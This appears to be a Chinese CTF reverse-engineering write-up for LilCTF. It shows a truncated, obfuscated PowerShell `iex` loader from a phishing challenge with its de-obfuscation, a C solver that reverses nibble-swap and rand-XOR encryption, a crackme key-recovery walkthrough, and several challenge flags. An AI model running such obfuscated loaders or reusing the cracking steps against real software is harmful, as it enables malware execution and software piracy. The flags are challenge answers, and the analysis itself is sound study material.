iex  ([CHar]36+[CHar]68+[CHar]101+[CHar]98+[CHar]117+[CHar]10
3+[CHar]80+[CHar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]114
+[CHar]101+[CHar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+[
CHar]32+[CHar]36+[CHar]69+[CHar]114+[CHar]114+[CHar]111+[CHa
r]114+[CHar]65+[CHar]99+[CHar]116+[CHar]105+[CHar]111+[CHar]
110+[CHar]80+[CHar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]1
14+[CHar]101+[CHar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+
[CHar]32+[CHar]36+[CHar]86+[CHar]101+[CHar]114+[CHar]98+[CHa
r]111+[CHar]115+[CHar]101+[CHar]80+[CHar]114+[CHar]101+[CHar
]102+[CHar]101+[CHar]114+[CHar]101+[CHar]110+[CHar]99+[CHar]
101+[CHar]32+[CHar]61+[CHar]32+[CHar]36+[CHar]87+[CHar]97+[C
Har]114+[CHar]110+[CHar]105+[CHar]110+[CHar]103+[CHar]80+[CH
ar]114+[CHar]101+[CHar]102+[CHar]101+[CHar]114+[CHar]101+[CH
ar]110+[CHar]99+[CHar]101+[CHar]32+[CHar]61+[CHar]32+[CHar]3
4+[CHar]83+[CHar]105+[CHar]108+[CHar]101+[CHar]110+[CHar]116
+[CHar]108+[CHar]121+[CHar]67+[CHar]111+.....)

# 这里把最外层的 iex(Invoke-Expression)去掉,只让 [CHar] 拼接表达式自行求值并输出,得到的就是最终脚本而不会执行它。开头那串字符拼出来的是 `$DebugPreference = $ErrorActionPreference = $VerbosePreference = $WarningPreference = "SilentlyCo...`,即先把所有输出静默掉,这是恶意脚本常见的开头

运行后得到的代码如图,其中便包含flag

image-20250822113045985

LILCTF{Be_VIG1L@NT_@6alnst_PH15hiNG}

obfusheader.h

一个混淆得比较狠的题,直接分析程序流行不通,题目提示可以追踪数据流

运行程序尝试一番试出来flag的长度为40

image-20250822172815403

通过字符串定位到输入函数的位置

可以得知我们的输入是存放在 unk_14003A040 的。根据题目提示我们无法正常追踪程序流,那就换成追踪数据:定位输入存放的位置,在这里下一个硬件读写(访问)断点,使其每次被读写时都能断下来。注意 x64 的硬件断点最多只有 4 个、每个最长只覆盖 8 字节,所以监视的只是缓冲区开头的几个字节,能断在“第一次碰这段数据”的位置就够了。

image-20250823150735057

第一处,计算输入长度

image-20250823151024934

第二次将输入的每两个字节与随机数异或

image-20250823153031399

断点下在 srand 的调用处,可以看到随机数种子为 rcx 存放的内容 0x48691412(Win64 调用约定下 rcx 是第一个整型参数,也就是 srand(seed) 的 seed)

image-20250823154805924

第三处为

image-20250823162949787

有七处相同类型的花指令逐一除去后得到反汇编如下

image-20250823165422831

逻辑是先把每个字节的高四位与低四位互换(即 (x << 4) | (x >> 4),反汇编里看到的“或运算”就是这一步),然后再对每个字节取反。解密时顺序相反:先取反、再把高低四位换回来,exp 里正是这样做的

最后一次在 msvcrt.dll 的 memcpy 函数,rax 存放加密后的输入,[rcx+rdx] 存放的是密文。这里还暴露了一个关键信息:程序链接的是 msvcrt.dll,那么它的 srand/rand 很可能也是 msvcrt 的实现。下面 exp 里的 rand() 必须和目标程序产出完全相同的序列(glibc 与 MSVC CRT 的 rand 算法并不相同),所以编译 exp 时要用与目标一致的 C 运行库,否则异或出来的只会是乱码——文中没有写明作者用的是哪套工具链,复现时请自行确认。

image-20250823214441243

exp如下:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>


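/* 40-byte expected value the target compares the encrypted input against
 * (the [rcx+rdx] operand at the final memcpy in msvcrt.dll). */
unsigned char cipher[] = {0x5C, 0xAF, 0xB0, 0x1C, 0xFC, 0xEF, 0xC7, 0x8D, 0x01, 0xDD, 0x34, 0x39, 0x13, 0xBE, 0x47, 0x2D, 0x0E, 0x7C, 0xFF, 0xFA, 0x7D, 0x0F, 0xD0, 0xFA, 0xFA, 0x3D, 0x81, 0xFD, 0x73, 0xA8, 0x06, 0x1C, 0xAB, 0x7B, 0x42, 0xEB, 0x65, 0xB9, 0xDF, 0x1B};

/* Undo the target's two transforms in reverse order and print the flag. */
int main(void){
    unsigned char flag[40];

    /* The target seeds its CRT PRNG with this constant (rcx at the srand call).
     * rand() below has to yield the *same* stream as the target's CRT: the
     * binary imports from msvcrt.dll, and the MSVC CRT generator differs from
     * glibc's, so build this solver against the CRT that reproduces the flag.
     * The writeup does not state which toolchain was used -- confirm. */
    srand(0x48691412);

    /* Undo stage 3 (applied last by the target, so undone first): the target
     * swaps the two nibbles of each byte and then complements it. */
    for (size_t i = 0; i < sizeof(cipher); i++) {
        unsigned char b = (unsigned char)~cipher[i];
        flag[i] = (unsigned char)((b << 4) | (b >> 4));
    }

    /* Undo stage 2: every byte pair, read as a little-endian 16-bit value, was
     * XORed with one rand() output (only its low 16 bits matter). Explicit byte
     * operations replace the former unsigned short* alias: no strict-aliasing
     * violation, and the low byte lands in flag[i] on any host, matching the
     * x64 target. */
    for (size_t i = 0; i + 1 < sizeof(cipher); i += 2) {
        int r = rand();
        flag[i]     ^= (unsigned char)(r & 0xFF);
        flag[i + 1] ^= (unsigned char)((r >> 8) & 0xFF);
    }

    /* The flag is not NUL-terminated; write exactly 40 bytes, then a newline
     * so the shell prompt does not run into it. */
    fwrite(flag, 1, sizeof(flag), stdout);
    putchar('\n');
    return 0;
}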
//LILCTF{wHat_Is_DatA1LOW_CaN_1T_b3_E4TeN}

Qt_Creator

image-20250824183425398

一道crackme,注册码即为flag,通过搜索字符串定位到最后的判断逻辑

image-20250824183857052

往上回溯到sub_40EE30函数,可以看到类似于密文的东西

image-20250824195732730

往下调发现加密函数在sub_40FFF0,是个简单的字符加减的解密

image-20250824221951657

ZNK9QLineEdit4textEv(demangle 后即 QLineEdit::text() const)是用来获取 QLineEdit 输入框中输入内容的函数。因为这里程序是对内置的密文做变换后再与输入比较,而不是对输入做加密,因此我们无需去还原加密算法:变换后的结果——也就是这里该函数的第二个参数——直接就是明文

image-20250824222153188

LILCTF{Q7_cre4t0r_1s_very_c0nv3ni3nt}

Oh_My_Uboot

  • 标题: LilCTF REwp+复现
  • 作者: w1n9
  • 创建于 : 2025-08-21 11:18:35
  • 更新于 : 2025-08-24 23:21:35
  • 链接: https://vv1n9.github.io/2025/08/21/LilCTF REwp+复现/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。